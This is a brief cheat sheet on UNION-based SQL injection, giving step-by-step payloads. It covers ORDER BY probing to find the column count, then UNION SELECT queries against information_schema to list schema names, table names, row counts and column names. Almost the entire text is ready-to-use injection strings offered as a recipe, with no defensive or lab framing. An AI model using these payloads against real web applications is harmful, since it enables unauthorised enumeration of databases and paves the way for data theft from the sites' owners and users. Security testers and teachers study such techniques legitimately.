SQL injection with UNION
First - identify number of columns using order by clause: 1 order by 1 -- 1 order by 2 -- . . . When error shows means that reached number of columns in select statement. Then find out schem a name: 1 union select schema_name,null,null,null from information_schema.schemata -- Next, find table name: 1 UNION SELECT table_name,TABLE_ROWS,TABLE_SCHEMA,null FROM information_schema.tables -- ... and column names: 1 UNION select column_name,table_name, table_schema,null from information_schema.columns --